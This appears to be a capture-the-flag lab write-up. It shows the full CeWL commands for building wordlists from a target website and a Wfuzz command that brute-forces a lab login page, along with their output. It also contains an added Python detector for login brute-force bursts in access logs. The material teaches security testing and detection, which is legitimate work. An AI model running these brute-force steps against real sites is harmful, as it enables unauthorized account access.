# Day 4

**Learning Objectives**

* What is CeWL?
* What are the capabilities of CeWL?
* How can we leverage CeWL to generate a custom wordlist from a website?
* How can we customise the tool's output for specific tasks?

The room is a very straightforward introduction to the tool with all the commands given.

CeWL is a wordlist generator that differs from most other tools: rather than relying on pre-defined lists or common dictionary attacks, it builds a custom wordlist from the content of the web pages it spiders.

We start by generating a basic wordlist from the website and writing it to a file.

```
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl http://10.10.126.196 -w output.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
```

The file contains a wordlist like the following.

```
└─$ cat output.txt  
Start
End
and
the
AntarctiCrafts
our
Stylesheet
.
.
.
Visit
office
Send
Message
Login
Submit
```

CeWL provides a lot of options that allow you to tailor the wordlist to your needs:

1. Specify spidering depth: The `-d` option allows you to set how deep CeWL should spider. For example, to spider two links deep: `cewl http://machine_ip -d 2 -w output1.txt`
2. Set minimum and maximum word length: Use the `-m` and `-x` options respectively. For instance, to get words between 5 and 10 characters: `cewl http://machine_ip -m 5 -x 10 -w output2.txt`
3. Handle authentication: If the target site is behind a login, you can use the `-a` flag for form-based authentication.
4. Custom extensions: The `--with-numbers` option will append numbers to words, and using `--extension` allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.
5. Follow external links: By default, CeWL doesn't spider external sites, but using the `--offsite` option allows you to do so.

For this room we need to gain access to the portal located at `http://machine_ip/login.php`.

<figure><img src="/files/1UBoGGMT5HMgy6d4Z4ID" alt=""><figcaption></figcaption></figure>

We first create a username list and a password list based on the website's content.

Username List:

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 0 -m 5 -w usernames.txt http://10.10.126.196/team.php --lowercase
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat usernames.txt
antarcticrafts
stylesheet
start
members
officer
.
.
.
links
rights
reserved
```

{% endcode %}

Password List:

```
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 2 -m 5 -w passwords.txt http://10.10.126.196 --with-numbers
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat passwords.txt
Start
AntarctiCrafts
Stylesheet
About
.
.
.
Message
Login
Submit
```

Now we can attempt to brute-force the login page with Wfuzz.

Wfuzz is a tool designed for brute-forcing web applications. It can be used to find unlinked resources (directories, servlets, scripts, etc.), brute-force GET and POST parameters to test for different kinds of injection (SQL, XSS, LDAP), brute-force form parameters (user/password), and perform general fuzzing.

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.126.196/login.php -d "username=FUZZ&password=FUZ2Z"
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.126.196/login.php
Total requests: 9361

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000006317:   302        118 L    297 W      4442 Ch     "[REDACTED] - [REDACTED]"

Total time: 0
Processed Requests: 9361
Filtered Requests: 9360
Requests/sec.: 0
```

{% endcode %}
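From the defender's side, the run above leaves a very distinctive footprint: thousands of POSTs to `login.php` from one address in a short span, with a single 302 among a wall of 200s. The following added example (not part of the original writeup or of Wfuzz) shows a small detection over constructed access-log lines in combined format: it flags any source that POSTs to the login path at least `threshold` times within a sliding `window`, and records the first redirect seen after the burst as the likely successful guess.

```python
import re
from collections import defaultdict
from datetime import datetime

def make_sample_log():
    """Constructed sample: 30 rapid POSTs from one source (the last gets a 302, as in
    the wfuzz output above) plus an ordinary login and a page view from another host."""
    lines = []
    for i in range(30):
        status = 302 if i == 29 else 200
        lines.append(f'10.10.14.5 - - [04/Dec/2023:10:00:{i:02d} +0000] '
                     f'"POST /login.php HTTP/1.1" {status} 4442')
    lines.append('192.168.1.20 - - [04/Dec/2023:10:00:05 +0000] "POST /login.php HTTP/1.1" 302 120')
    lines.append('192.168.1.20 - - [04/Dec/2023:10:30:05 +0000] "GET /index.php HTTP/1.1" 200 3000')
    return lines

# Combined-log-format prefix: source, timestamp, request line, status code.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def find_login_bursts(lines, path="/login.php", threshold=20, window=60):
    """Return {ip: {"attempts": n, "success_after_burst": iso_ts_or_None}} for every
    source that POSTs to `path` at least `threshold` times within any `window` seconds."""
    events = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m and m["method"] == "POST" and m["path"] == path:
            events[m["ip"]].append((datetime.strptime(m["ts"], TS_FMT), int(m["status"])))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        start, burst_hit, success = 0, False, None
        for i, (ts, status) in enumerate(evs):
            while (ts - evs[start][0]).total_seconds() > window:   # slide the window
                start += 1
            if i - start + 1 >= threshold:
                burst_hit = True
            if burst_hit and status == 302 and success is None:    # first redirect after burst
                success = ts.isoformat()
        if burst_hit:
            findings[ip] = {"attempts": len(evs), "success_after_burst": success}
    return findings
```

The same logic works on real access logs line by line; tune `threshold` and `window` to the normal login rate of the application.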

We now have our username and password and can proceed to log in to the portal.

<figure><img src="/files/eVb9vTLdIQU3T77VkRop" alt=""><figcaption></figcaption></figure>

We can see this is a mailbox, and the flag can be found here.

***
